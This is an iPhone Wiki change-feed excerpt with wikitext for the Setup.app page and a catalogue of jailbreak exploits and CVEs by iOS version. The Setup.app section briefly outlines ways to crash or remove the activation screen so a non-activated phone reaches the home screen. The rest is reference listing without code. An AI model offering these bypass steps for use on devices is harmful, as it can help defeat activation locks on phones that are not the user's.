While this app is running, the [[/System/Library/CoreServices/SpringBoard.app]] app is frozen. Apple implemented this to prevent crashes by flooding Setup.app with Emoji keys or by overloading it's browser components with Javascript loops.&lt;br /&gt;
&lt;br /&gt;
While the application's name is Setup.App, its internal bundle identifier is com.apple.purplebuddy.&lt;br /&gt;
&lt;br /&gt;
As Setup.app is running it's window over [[/System/Library/CoreServices/SpringBoard.app]], crashing this app will leave the [[/System/Library/CoreServices/SpringBoard.app]] opened and let the phone be usable as a normal one even if it is not activated (but it has no service)(see Baseband Brickstate).&lt;br /&gt;
&lt;br /&gt;
Crashing this app unlocks [[/System/Library/CoreServices/SpringBoard.app]] processes as the crash will entirely close the Setup.&lt;br /&gt;
&lt;br /&gt;
This app is started automatically by lockdownd file, and it's configuration files consists in [[Com.apple.purplebuddy.plist]] file that contains Setup.app progress.&lt;br /&gt;
When setup is finished, this configuration file prevents Setup.app from showing up using these tags:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;&lt;br /&gt;
&amp;lt;key&amp;gt;SetupDone&amp;lt;/key&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
	&amp;lt;true/&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;key&amp;gt;SetupFinishedAllSteps&amp;lt;/key&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
	&amp;lt;true/&amp;gt;&lt;br /&gt;
&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Setting it to false might not trigger the Setup.app as lockdownd finds the activation ticket inside lockdown folder.&lt;br /&gt;
&lt;br /&gt;
==Crashing the Setup.app==&lt;br /&gt;
Ever since Apple introduced it, it was a kind of problem as this app prevents you from activating the device if you buy it from a foreign country and you don't have the foreign SIM CARD, therefore, a bunch of methods to overcome this app were created during its life.&lt;br /&gt;
&lt;br /&gt;
* The Emoji Keys: Originally posted on YouTube, consists in flooding DNS / WiFi name fields with literally thousands of emojis. The Setup.app will crash rebooting the phone or going to [[/System/Library/CoreServices/SpringBoard.app]]. Apple has patched that method in iOS 9.2&lt;br /&gt;
* Button stressing: Consists in stressing out the Next&amp;gt; and &amp;lt;Back buttons in the same time until the app crashes. This behavior has been fixed in iOS 9.0&lt;br /&gt;
* Removing the app entirely: On A4 devices, due to their compatibility to limera1n (therefore the compatibility with @msftguy's SSH RD TOOL), you can SSH in DFU Mode to have access to the File System. Removing the app from /mnt1/Applications folder will redirect to [[/System/Library/CoreServices/SpringBoard.app]].&lt;br /&gt;
* Creating Custom-made firmware (CFW) with patched Setup.app: If you patch the application or anyway invalidate it, AMFI will not open it anymore thus redirecting to the Home Screen ([[/System/Library/CoreServices/SpringBoard.app]]). There are multiple ways you can patch the Mach-O app. This method still works.&lt;br /&gt;
&lt;br /&gt;
== Parents ==&lt;br /&gt;
{{parent|Applications}}&lt;br /&gt;
&lt;br /&gt;
[[Category:Software]]&lt;br /&gt;
[[Category:Filesystem]]&lt;br /&gt;
[[Category:Application]]&lt;/div&gt;</summary>
		<author><name>Inflatable Man</name></author>
		
	</entry>
	<entry>
		<id>https://www.theiphonewiki.com/w/index.php?title=Jailbreak_Exploits&amp;diff=106039</id>
		<title>Jailbreak Exploits</title>
		<link rel="alternate" type="text/html" href="https://www.theiphonewiki.com/w/index.php?title=Jailbreak_Exploits&amp;diff=106039"/>
		<updated>2020-07-26T01:14:52Z</updated>

		<summary type="html">&lt;p&gt;Inflatable Man: /* Unc0ver (12.0 - 12.2 / 12.4 / 12.4.1 / 12.4.2 - 12.4.8) */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;This page lists the '''exploits''' used in [[jailbreak]]s.&lt;br /&gt;
&lt;br /&gt;
== Common exploits ==&lt;br /&gt;
These exploits are not dependent on any firmware; as such, they are used in numerous jailbreaking programs.&lt;br /&gt;
&lt;br /&gt;
* [[Pwnage]] + [[Pwnage 2.0]] (together to jailbreak the [[M68AP|iPhone]], [[N45AP|iPod touch]], and [[N82AP|iPhone 3G]])&lt;br /&gt;
* [[ARM7 Go]] (from iOS 2.1.1) (for [[tethered jailbreak]] on [[N72AP|iPod touch (2nd generation)]])&lt;br /&gt;
* [[0x24000 Segment Overflow]] (for [[untethered jailbreak]] on [[N88AP|iPhone 3GS]] with [[Bootrom 359.3|old bootrom]] and [[N72AP|iPod touch (2nd generation)]] with [[Bootrom 240.4|old bootrom]]; another exploit as the [[limera1n Exploit]] is required)&lt;br /&gt;
* [[limera1n Exploit]] (for [[tethered jailbreak]] on [[N88AP|iPhone 3GS]], [[N18AP|iPod touch (3rd generation)]], [[K48AP|iPad]], [[iPhone 4]], [[N81AP|iPod touch (4th generation)]] and [[K66AP|Apple TV (2nd generation)]])&lt;br /&gt;
* [[usb_control_msg(0xA1, 1) Exploit]] (also known as &amp;quot;steaks4uce&amp;quot;) (for [[tethered jailbreak]] on [[N72AP|iPod touch (2nd generation)]])&lt;br /&gt;
&lt;br /&gt;
== Jailbreak Programs ==&lt;br /&gt;
=== [[PwnageTool]] (2.0 - 5.1.1) ===&lt;br /&gt;
* uses different common exploits&lt;br /&gt;
* uses the exploits listed below to untether up to iOS 5.1.1&lt;br /&gt;
&lt;br /&gt;
=== [[redsn0w]] (3.0 - 6.0) ===&lt;br /&gt;
* uses different common exploits&lt;br /&gt;
* uses the same exploits as [[Absinthe|Absinthe]] and [[Absinthe|Absinthe 2.0]] to jailbreak iOS 5.0/5.0.1 and 5.1.1&lt;br /&gt;
* uses the exploits listed below to untether up to iOS 5.1.1&lt;br /&gt;
&lt;br /&gt;
=== [[sn0wbreeze]] (3.1.3 - 6.1.3) ===&lt;br /&gt;
* uses different common exploits&lt;br /&gt;
* uses the exploits listed below to untether up to iOS 6.1.2&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 1.x ==&lt;br /&gt;
=== [[AppTapp Installer]] (1.0 / 1.0.1 / 1.0.2) ===&lt;br /&gt;
* iBoot &amp;lt;code&amp;gt;cp&amp;lt;/code&amp;gt;-command exploit&lt;br /&gt;
&lt;br /&gt;
=== [[iBrickr]] (1.0 / 1.0.1 / 1.0.2) ===&lt;br /&gt;
* iBoot &amp;lt;code&amp;gt;cp&amp;lt;/code&amp;gt;-command exploit&lt;br /&gt;
&lt;br /&gt;
=== [[AppSnapp]]/[[JailbreakMe|JailbreakMe 1.0]] (1.0 / 1.0.1 / 1.0.2 / 1.1.1) ===&lt;br /&gt;
* [[LibTiff|libtiff exploit]] (Adapted from the PSP scene, used by [[JailbreakMe]]) ({{cve|2006-3459}})&lt;br /&gt;
&lt;br /&gt;
=== [[mknod|OktoPrep]] (1.1.2) ===&lt;br /&gt;
&amp;quot;Upgrade&amp;quot; to 1.1.2 from a jailbroken 1.1.1&lt;br /&gt;
* [[mknod]]&lt;br /&gt;
&lt;br /&gt;
=== [[Soft Upgrade]] (1.1.3) ===&lt;br /&gt;
&amp;quot;Upgrade&amp;quot; to 1.1.3 from a running jailbroken 1.1.2&lt;br /&gt;
&lt;br /&gt;
=== [[ZiPhone]] (1.1.3 / 1.1.4 / 1.1.5) ===&lt;br /&gt;
* [[Ramdisk Hack]]&lt;br /&gt;
&lt;br /&gt;
=== [[iLiberty+|iLiberty / iLiberty+]] (1.1.3 / 1.1.4 / 1.1.5) ===&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 2.x ==&lt;br /&gt;
=== [[QuickPwn]] (2.0 - 2.2.1) ===&lt;br /&gt;
* uses [[Pwnage]] and [[Pwnage 2.0]]&lt;br /&gt;
&lt;br /&gt;
=== [[Redsn0w Lite]] (2.1.1) ===&lt;br /&gt;
* [[ARM7 Go]] (for [[N72AP|iPod touch (2nd generation)]] only)&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 3.x ==&lt;br /&gt;
=== [[purplera1n]] (3.0) ===&lt;br /&gt;
* [[iBoot Environment Variable Overflow]] ({{cve|2009-2795}})&lt;br /&gt;
* uses [[0x24000 Segment Overflow]]&lt;br /&gt;
&lt;br /&gt;
=== [[blackra1n]] (3.1 / 3.1.1 / 3.1.2) ===&lt;br /&gt;
* [[usb_control_msg(0x21, 2) Exploit]] ({{cve|2010-0038}})&lt;br /&gt;
* uses [[0x24000 Segment Overflow]]&lt;br /&gt;
&lt;br /&gt;
=== [[Spirit]] (3.1.2 / 3.1.3 / 3.2) ===&lt;br /&gt;
* [[MobileBackup Copy Exploit]]&lt;br /&gt;
* [[Incomplete Codesign Exploit]]&lt;br /&gt;
* [[BPF_STX Kernel Write Exploit]]&lt;br /&gt;
&lt;br /&gt;
=== [[Star|JailbreakMe 2.0 / Star]] (3.1.2 / 3.1.3 / 3.2 / 3.2.1) ===&lt;br /&gt;
* [[Malformed CFF Vulnerability]] ({{cve|2010-1797}})&lt;br /&gt;
* [[Incomplete Codesign Exploit]]&lt;br /&gt;
* [[IOSurface Kernel Exploit]] ({{cve|2010-2973}})&lt;br /&gt;
&lt;br /&gt;
=== [[limera1n]] / [[greenpois0n (jailbreak)|greenpois0n]] (3.2.2) ===&lt;br /&gt;
* uses different common exploits&lt;br /&gt;
* [[Packet Filter Kernel Exploit]]&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 4.x ==&lt;br /&gt;
=== [[Star|JailbreakMe 2.0 / Star]] (4.0 / 4.0.1) ===&lt;br /&gt;
* [[Malformed CFF Vulnerability]] ({{cve|2010-1797}})&lt;br /&gt;
* [[Incomplete Codesign Exploit]]&lt;br /&gt;
* [[IOSurface Kernel Exploit]] ({{cve|2010-2973}})&lt;br /&gt;
&lt;br /&gt;
=== [[limera1n]] (4.0 / 4.0.1 / 4.0.2 / 4.1) ===&lt;br /&gt;
* uses different common exploits&lt;br /&gt;
* [[Packet Filter Kernel Exploit]]&lt;br /&gt;
&lt;br /&gt;
=== [[greenpois0n (jailbreak)|greenpois0n]] (4.1) ===&lt;br /&gt;
* uses different common exploits&lt;br /&gt;
* [[Packet Filter Kernel Exploit]]&lt;br /&gt;
&lt;br /&gt;
=== [[greenpois0n (jailbreak)|greenpois0n]] (4.2.1) ===&lt;br /&gt;
* uses different common exploits&lt;br /&gt;
* [[HFS Legacy Volume Name Stack Buffer Overflow]]&lt;br /&gt;
&lt;br /&gt;
=== [[Saffron|JailbreakMe 3.0 / Saffron]] (4.2.6 / 4.2.7 / 4.2.8) ===&lt;br /&gt;
* [[T1 Font Integer Overflow]] ({{cve|2011-0226}})&lt;br /&gt;
* [[HFS Legacy Volume Name Stack Buffer Overflow]]&lt;br /&gt;
&lt;br /&gt;
=== [[unthredeh4il]] (4.2.6 - 4.2.10) ===&lt;br /&gt;
Except for the [[iPad (3rd generation)]]&lt;br /&gt;
* MobileBackup2 Copy Exploit&lt;br /&gt;
* a new Packet Filter Kernel Exploit ({{cve|2012-3728}})&lt;br /&gt;
* [[AMFID code signing evasion]] ({{cve|2013-0977}})&lt;br /&gt;
* [[launchd.conf untether]]&lt;br /&gt;
* [[Timezone Vulnerability]]&lt;br /&gt;
&lt;br /&gt;
=== [[Saffron|JailbreakMe 3.0 / Saffron]] (4.3 / 4.3.1 / 4.3.2 / 4.3.3) ===&lt;br /&gt;
Except for the [[N18AP|iPod touch (3rd generation)]] on iOS 4.3.1.&lt;br /&gt;
* [[T1 Font Integer Overflow]] ({{cve|2011-0226}})&lt;br /&gt;
* [[IOMobileFrameBuffer Privilege Escalation Exploit]] ({{cve|2011-0227}})&lt;br /&gt;
&lt;br /&gt;
=== i0nic's Untether (4.3.1 / 4.3.2 / 4.3.3) ===&lt;br /&gt;
used in [[redsn0w]] to untether iOS 4.3.1 / 4.3.2 / 4.3.3&lt;br /&gt;
* [[ndrv_setspec() Integer Overflow]]&lt;br /&gt;
&lt;br /&gt;
=== [[unthredeh4il]] (4.3 - 4.3.5) ===&lt;br /&gt;
Except for the [[iPad (3rd generation)]]&lt;br /&gt;
* MobileBackup2 Copy Exploit&lt;br /&gt;
* a new Packet Filter Kernel Exploit ({{cve|2012-3728}})&lt;br /&gt;
* [[AMFID code signing evasion]] ({{cve|2013-0977}})&lt;br /&gt;
* [[launchd.conf untether]]&lt;br /&gt;
* [[Timezone Vulnerability]]&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 5.x ==&lt;br /&gt;
&lt;br /&gt;
=== [[Absinthe]] (5.0 on [[N94AP|iPhone 4S]] only / 5.0.1 on [[iPad 2]] and [[iPhone 4S]])  ===&lt;br /&gt;
* [[Racoon String Format Overflow Exploit]] ({{cve|2012-0646}}) (used both for payload injection and untether)&lt;br /&gt;
* [[HFS Heap Overflow]] ({{cve|2012-0642}})&lt;br /&gt;
* unknown exploit ({{cve|2012-0643}})&lt;br /&gt;
&lt;br /&gt;
=== [[Corona|Corona Untether]] (5.0.1)  ===&lt;br /&gt;
* [[Racoon String Format Overflow Exploit]] ({{cve|2012-0646}})&lt;br /&gt;
* [[HFS Heap Overflow]] ({{cve|2012-0642}})&lt;br /&gt;
* unknown exploit ({{cve|2012-0643}})&lt;br /&gt;
&lt;br /&gt;
=== [[Absinthe|Absinthe 2.0]] and [[Rocky Racoon|Rocky Racoon Untether]] (5.1.1) ===&lt;br /&gt;
* a new Packet Filter Kernel Exploit ({{cve|2012-3728}})&lt;br /&gt;
* Racoon DNS4/WINS4 table buffer overflow ({{cve|2012-3727}})&lt;br /&gt;
* MobileBackup2 Copy Exploit&lt;br /&gt;
&lt;br /&gt;
=== [[unthredeh4il]] (5.0-5.1.1) ===&lt;br /&gt;
Except for the [[iPad (3rd generation)]]&lt;br /&gt;
* MobileBackup2 Copy Exploit&lt;br /&gt;
* a new Packet Filter Kernel Exploit ({{cve|2012-3728}})&lt;br /&gt;
* [[AMFID code signing evasion]] ({{cve|2013-0977}})&lt;br /&gt;
* [[launchd.conf untether]]&lt;br /&gt;
* [[Timezone Vulnerability]]&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 6.x ==&lt;br /&gt;
=== [[evasi0n]] (6.0 / 6.0.1 / 6.0.2 / 6.1 / 6.1.1 / 6.1.2)  ===&lt;br /&gt;
* [[Symbolic Link Vulnerability]] ({{cve|2013-0979}})&lt;br /&gt;
* [[Timezone Vulnerability]]&lt;br /&gt;
* [[Shebang Trick]] ({{cve|2013-5154}})&lt;br /&gt;
* [[AMFID code signing evasion]]&lt;br /&gt;
* [[launchd.conf untether]]&lt;br /&gt;
* [[IOUSBDeviceFamily Vulnerability]] ({{cve|2013-0981}})&lt;br /&gt;
* [[ARM Exception Vector Info Leak]] ({{cve|2013-0978}})&lt;br /&gt;
* [[dynamic memmove() locating]]&lt;br /&gt;
* [[vm_map_copy_t corruption for arbitrary memory disclosure]]&lt;br /&gt;
* [[kernel memory write via ROP gadget]]&lt;br /&gt;
* [[Overlapping Segment Attack]] ({{cve|2013-0977}})&lt;br /&gt;
&lt;br /&gt;
=== [[p0sixspwn]] (6.1.3 / 6.1.4 / 6.1.5 / 6.1.6) ===&lt;br /&gt;
* [[posix_spawn kernel information leak]] ({{cve|2013-3954}}) (by [[i0n1c]])&lt;br /&gt;
* [[posix_spawn kernel exploit]] ({{cve|2013-3954}}) (by [[i0n1c]])&lt;br /&gt;
* [[mach_msg_ool_descriptor_ts for heap shaping]] ({{cve|2013-3953}})&lt;br /&gt;
* [[AMFID_code_signing_evasi0n7]] ({{cve|2014-1273}})&lt;br /&gt;
* [[DeveloperDiskImage race condition]] (by [[comex]])&lt;br /&gt;
* [[launchd.conf untether]]&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 7.x ==&lt;br /&gt;
=== [[evasi0n7]] (7.0 / 7.0.1 / 7.0.2 / 7.0.3 / 7.0.4 / 7.0.5 / 7.0.6) ===&lt;br /&gt;
{{Section Stub}}&lt;br /&gt;
* [[Symbolic Link Vulnerability]] ({{cve|2013-5133}})&lt;br /&gt;
* [[AMFID_code_signing_evasi0n7]] ({{cve|2014-1273}})&lt;br /&gt;
* CrashHouseKeeping chmod vulnerability ({{cve|2014-1272}})&lt;br /&gt;
* ptmx_get_ioctl ioctl crafted call ({{cve|2014-1278}})&lt;br /&gt;
&lt;br /&gt;
=== [[Geeksn0w]] (7.1 / 7.1.1) ===&lt;br /&gt;
* [[limera1n]]'s bootrom exploit ([[Tethered jailbreak]]) on [[iPhone 4]]&lt;br /&gt;
&lt;br /&gt;
=== [[Pangu]] (7.1 / 7.1.1 / 7.1.2) ===&lt;br /&gt;
* Mach-O OSBundleHeaders info leak ({{cve|2014-4491}}) (Pangu v1.0.0)&lt;br /&gt;
* AppleKeyStore::initUserClient info leak ({{cve|2014-4407}}) (Pangu &amp;gt;v1.0.0)&lt;br /&gt;
* break_early_random (by [[i0n1c]] and Tarjei Mandt of Azimuth) ({{cve|2014-4422}})&lt;br /&gt;
* mach_port_kobject exploit {{cve|2014-4496}} - used to recover the permutation value and addresses of kernel objects&lt;br /&gt;
* IOSharedDataQueue notification port overwrite ({{cve|2014-4461}})&lt;br /&gt;
* &amp;quot;syslogd chown&amp;quot; vulnerability&lt;br /&gt;
* enterprise certificate (no real exploit, used for initial &amp;quot;unsigned&amp;quot; code execution)&lt;br /&gt;
* &amp;quot;foo_extracted&amp;quot; symlink vulnerability (used to write to /var) ({{cve|2014-4386}})&lt;br /&gt;
* /tmp/bigfile (a big file for improvement of the reliability of a race condition)&lt;br /&gt;
* VoIP backgrounding trick (used to auto restart the app)&lt;br /&gt;
* hidden segment attack&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 8.x ==&lt;br /&gt;
=== [[Pangu8]] (8.0 / 8.0.1 / 8.0.2 / 8.1) ===&lt;br /&gt;
* an exploit for a bug in /usr/libexec/neagent (source @iH8sn0w)&lt;br /&gt;
* enterprise certificate (inside the IPA)&lt;br /&gt;
* a kind of dylib injection into a system process (see IPA)&lt;br /&gt;
* a dmg mount command (looks like the Developer DMG) (syslog while jailbreaking)&lt;br /&gt;
* a sandboxing problem in debugserver ({{cve|2014-4457}})&lt;br /&gt;
* mach_port_kobject exploit {{cve|2014-4496}} - used to recover the permutation value and addresses of kernel objects&lt;br /&gt;
* the same kernel exploit as used in [[Pangu|the first Pangu]] ({{cve|2014-4461}}) (source @iH8sn0w) - now used to also leak kernel memory (source @Morpheus______)&lt;br /&gt;
* enable-dylibs-to-override-cache&lt;br /&gt;
* a new ovelapping segment attack ({{cve|2014-4455}})&lt;br /&gt;
&lt;br /&gt;
=== [[TaiG]] and [[PPJailbreak]] (8.0 / 8.0.1 / 8.0.2 / 8.1 / 8.1.1 / 8.1.2) ===&lt;br /&gt;
(See also details at [http://newosxbook.com/articles/TaiG.html newosxbook.com])&lt;br /&gt;
* A new AFC symlink attack ({{cve|2014-4480}}) - to get onto the device filesystem&lt;br /&gt;
* [[DeveloperDiskImage race condition]] (by [[comex]], also used in p0sixspwn) - to mount a fake DDI and instantly overwrite (via union) libmis/xpcd_cache&lt;br /&gt;
* A new overlapping segment attack [in a modified version], dyld, ({{cve|2014-4455}}) - negative LC_SEGMENT - to allow libmis and xpcdcache to load&lt;br /&gt;
* libmis redirection of MISValidateSignature (as per evasion) to kCFEqual, with overlapping segment variant on TaiG (Segment at end of file, negative)&lt;br /&gt;
* enable-dylibs-to-override-cache - force loading of dynamic libraries from filesystem (where available) instead of the shared cache (overriding libmis/xpcd_cache)&lt;br /&gt;
* MobileStorageMounter exploit ({{cve|2015-1062}})&lt;br /&gt;
* Backup exploit used to access restricted parts of the filesystem ({{cve|2015-1087}})&lt;br /&gt;
&lt;br /&gt;
Kernel:&lt;br /&gt;
&lt;br /&gt;
* Mach-O OSBundleHeaders info leak ({{cve|2014-4491}}) - leaks slid addresses&lt;br /&gt;
* mach_port_kobject exploit {{cve|2014-4496}} - used to recover the permutation value and addresses of kernel objects&lt;br /&gt;
* IOHIDFamily Kernel exploit ({{cve|2014-4487}}) - to overwrite memory&lt;br /&gt;
&lt;br /&gt;
=== [[TaiG]] and [[PPJailbreak]] (8.1.3 / 8.2 / 8.3 / 8.4) ===&lt;br /&gt;
(See also details at http://newosxbook.com/articles/28DaysLater.html and http://newosxbook.com/articles/HIDeAndSeek.html)&lt;br /&gt;
* [[DeveloperDiskImage race condition]] (also used in TaiG for 8.0-8.1.2 but modified) - to mount a fake DDI&lt;br /&gt;
* enable-dylibs-to-override-cache - force loading of dynamic libraries from filesystem (where available) instead of the shared cache (overriding libmis)&lt;br /&gt;
* Symbolic linking to AFC ({{cve|2015-5746}})&lt;br /&gt;
* Backup exploit to write to protected regions of the disk ({{cve|2015-5752}})&lt;br /&gt;
* Code signing exploit ({{cve|2015-3802}})&lt;br /&gt;
* Code signing exploit ({{cve|2015-3803}})&lt;br /&gt;
* Code signing exploit ({{cve|2015-3805}})&lt;br /&gt;
* Code signing exploit ({{cve|2015-3806}})&lt;br /&gt;
* IOHIDFamily exploit ({{cve|2015-5774}})&lt;br /&gt;
* Air Traffic exploit to allow attackers to access arbitrary filesystem locations via vectors related to asset handling ({{cve|2015-5766}})&lt;br /&gt;
&lt;br /&gt;
=== [[EtasonJB]] and [[Home Depot]] (8.4.1) === &lt;br /&gt;
&lt;br /&gt;
* OSUnserialize Information leak ({{cve|2016-4655}})&lt;br /&gt;
* Kernel exploit ({{cve|2016-4656}})&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 9.x ==&lt;br /&gt;
=== [[Pangu9]] (9.0 / 9.0.1 / 9.0.2 / 9.1) ===&lt;br /&gt;
* Photos exploit to gain arbitrary unsandboxed file system access as mobile to load outdated DDI. ({{cve|2015-7037}})&lt;br /&gt;
* MobileStorageMounter allowed older DeveloperDiskImages to be mounted, resulting in unsandboxed unsigned code execution due to known weaknesses in entitled executables.  ({{cve|2015-7051}})&lt;br /&gt;
* IOHIDFamily Use-After-Free for kernel information leak / code execution as mobile. ({{cve|2015-6974}})&lt;br /&gt;
* dyld exploit in dyld shared cache handling to override MISValidateSignature in libmis.dylib for persistency ({{cve|2015-7079}})&lt;br /&gt;
* Racing KPP for some of the patches.&lt;br /&gt;
* AMFI MAC Hooks were in non-__const __DATA section, so wouldn't be integrity checked by KPP, allowing to replace MAC hooks required for code-signing. ({{cve|2015-7055}})&lt;br /&gt;
&lt;br /&gt;
=== [[Pangu9]] (9.2 / 9.2.1 / 9.3 / 9.3.1 / 9.3.2 / 9.3.3) ===&lt;br /&gt;
* IOMobileFrameBuffer exploit to execute arbitrary code with kernel privileges. ({{cve|2016-4654}})&lt;br /&gt;
&lt;br /&gt;
=== [[jbme]] (9.2 / 9.2.1 / 9.3 / 9.3.1 / 9.3.2 / 9.3.3) ===&lt;br /&gt;
* Webkit exploit ({{cve|2016-4657}})&lt;br /&gt;
&lt;br /&gt;
=== [[Home Depot]] (9.1-9.3.4) === &lt;br /&gt;
* OSUnserialize Information leak ({{cve|2016-4655}})&lt;br /&gt;
* Kernel exploit ({{cve|2016-4656}})&lt;br /&gt;
&lt;br /&gt;
=== [[JailbreakMe 4.0]] (9.1-9.3.4) === &lt;br /&gt;
* OSUnserialize Information leak ({{cve|2016-4655}})&lt;br /&gt;
* Kernel exploit ({{cve|2016-4656}})&lt;br /&gt;
* Webkit exploit ({{cve|2016-4657}})&lt;br /&gt;
&lt;br /&gt;
=== [[Phœnix]] (9.3.5 / 9.3.6) === &lt;br /&gt;
* OSUnserialize Information leak ({{cve|2016-4655}})&lt;br /&gt;
* mach_port_register Kernel exploit ({{cve|2016-4669}})&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 10.x ==&lt;br /&gt;
&lt;br /&gt;
=== [[extra_recipe+yaluX]] (10.0-10.1.1) ===&lt;br /&gt;
&lt;br /&gt;
* set_dp_control_port exploit to execute arbitrary code with kernel privileges. ({{cve|2016-7644}})&lt;br /&gt;
&lt;br /&gt;
=== [[yalu102]] (10.0.1-10.2) ===&lt;br /&gt;
&lt;br /&gt;
* mach_voucher_extract_attr_recipe_trap memory corruption. ({{cve|2017-2370}})&lt;br /&gt;
&lt;br /&gt;
=== [[doubleH3lix]] (10.0.1 - 10.3.3) ===&lt;br /&gt;
&lt;br /&gt;
* IOSurface Kernel Exploit ({{cve|2017-13861}})&lt;br /&gt;
&lt;br /&gt;
=== [[Meridian]] (10.0 - 10.3.3) ===&lt;br /&gt;
&lt;br /&gt;
* IOSurface Kernel Exploit ({{cve|2017-13861}})&lt;br /&gt;
&lt;br /&gt;
=== [[TotallyNotSpyware]] (10.0 - 10.3.3) ===&lt;br /&gt;
&lt;br /&gt;
* IOSurface Kernel Exploit ({{cve|2017-13861}})&lt;br /&gt;
* WebKit JIT optimization bug exploit ({{cve|2018-4233}})&lt;br /&gt;
&lt;br /&gt;
=== [[H3lix]] (10.0.1 - 10.3.4) ===&lt;br /&gt;
&lt;br /&gt;
* IOSurface Kernel Exploit ({{cve|2017-13861}})&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 11.x ==&lt;br /&gt;
&lt;br /&gt;
===[[Unc0ver]] (11.0-11.4.1)===&lt;br /&gt;
&lt;br /&gt;
11.0 - 11.1.2 &lt;br /&gt;
&lt;br /&gt;
* IOSurface Kernel Exploit ({{cve|2017-13861}})&lt;br /&gt;
&lt;br /&gt;
11.0 - 11.3.1&lt;br /&gt;
&lt;br /&gt;
* mptcp_usr_connectx (multi_path) ({{cve|2018-4241}})&lt;br /&gt;
* getvolattrlist (empty_list) ({{cve|2018-4243}})&lt;br /&gt;
&lt;br /&gt;
11.0 - 11.4.1&lt;br /&gt;
&lt;br /&gt;
* voucher_swap ({{cve|2019-6225}}) &lt;br /&gt;
&lt;br /&gt;
===[[Electra]] (11.0-11.4.1)===&lt;br /&gt;
&lt;br /&gt;
11.0 - 11.1.2&lt;br /&gt;
&lt;br /&gt;
* IOSurface Kernel Exploit ({{cve|2017-13861}})&lt;br /&gt;
&lt;br /&gt;
11.2 - 11.3.1&lt;br /&gt;
&lt;br /&gt;
* mptcp_usr_connectx (multi_path) ({{cve|2018-4241}})&lt;br /&gt;
* getvolattrlist (empty_list) ({{cve|2018-4243}})&lt;br /&gt;
&lt;br /&gt;
11.2 - 11.4.1&lt;br /&gt;
&lt;br /&gt;
* v1ntex ({{cve|2019-6225}})&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 12.x ==&lt;br /&gt;
&lt;br /&gt;
===[[Chimera]] (12.0 - 12.2 / 12.4)===&lt;br /&gt;
&lt;br /&gt;
12.0 - 12.1.2&lt;br /&gt;
&lt;br /&gt;
* voucher_swap ({{cve|2019-6225}}) &lt;br /&gt;
&lt;br /&gt;
12.0 - 12.2/12.4&lt;br /&gt;
&lt;br /&gt;
* SockPuppet ({{cve|2019-8605}})&lt;br /&gt;
&lt;br /&gt;
===[[Unc0ver]] (12.0 - 12.2 / 12.4 / 12.4.1 / 12.4.2 - 12.4.8)===&lt;br /&gt;
&lt;br /&gt;
12.0 - 12.1.2&lt;br /&gt;
&lt;br /&gt;
* voucher_swap ({{cve|2019-6225}}) &lt;br /&gt;
&lt;br /&gt;
12.0 - 12.2/12.4&lt;br /&gt;
&lt;br /&gt;
* SockPuppet ({{cve|2019-8605}})&lt;br /&gt;
&lt;br /&gt;
12.4.1&lt;br /&gt;
&lt;br /&gt;
* AppleAVE2Driver exploit ({{cve|2019-8795}})&lt;br /&gt;
* AppleSPUProfileDriver information leak ({{cve|2019-8794}})&lt;br /&gt;
&lt;br /&gt;
12.4.2 - 12.4.8&lt;br /&gt;
&lt;br /&gt;
* oob_timestamp ({{cve|2020-3837}})&lt;br /&gt;
* cuck00 information leak ({{cve|2020-3836}})&lt;br /&gt;
&lt;br /&gt;
===[[checkra1n]] (12.3 - 12.4.7)===&lt;br /&gt;
&lt;br /&gt;
* [[Checkm8_Exploit | checkm8]] ({{cve|2019-8900}})&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 13.x ==&lt;br /&gt;
&lt;br /&gt;
===[[Unc0ver]] (13.0 - 13.5)===&lt;br /&gt;
&lt;br /&gt;
13.0 - 13.3 (before version 5.0.0)&lt;br /&gt;
&lt;br /&gt;
* oob_timestamp ({{cve|2020-3837}})&lt;br /&gt;
* cuck00 information leak ({{cve|2020-3836}})&lt;br /&gt;
&lt;br /&gt;
13.0 - 13.5 (since version 5.0.0)&lt;br /&gt;
&lt;br /&gt;
* tachy0n (LightSpeed) ({{cve|2020-9859}})&lt;br /&gt;
&lt;br /&gt;
===[[checkra1n]] (13.0 - 13.5)===&lt;br /&gt;
&lt;br /&gt;
* [[Checkm8_Exploit | checkm8]] ({{cve|2019-8900}})&lt;/div&gt;</summary>
		<author><name>Inflatable Man</name></author>
		
	</entry>
	<entry>
		<id>https://www.theiphonewiki.com/w/index.php?title=Jailbreak_Exploits&amp;diff=106038</id>
		<title>Jailbreak Exploits</title>
		<link rel="alternate" type="text/html" href="https://www.theiphonewiki.com/w/index.php?title=Jailbreak_Exploits&amp;diff=106038"/>
		<updated>2020-07-26T01:13:59Z</updated>

		<summary type="html">&lt;p&gt;Inflatable Man: /* Unc0ver (13.0 - 13.5) */ Corrected capitalization of cve&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;This page lists the '''exploits''' used in [[jailbreak]]s.&lt;br /&gt;
&lt;br /&gt;
== Common exploits ==&lt;br /&gt;
These exploits are not dependent on any firmware; as such, they are used in numerous jailbreaking programs.&lt;br /&gt;
&lt;br /&gt;
* [[Pwnage]] + [[Pwnage 2.0]] (together to jailbreak the [[M68AP|iPhone]], [[N45AP|iPod touch]], and [[N82AP|iPhone 3G]])&lt;br /&gt;
* [[ARM7 Go]] (from iOS 2.1.1) (for [[tethered jailbreak]] on [[N72AP|iPod touch (2nd generation)]])&lt;br /&gt;
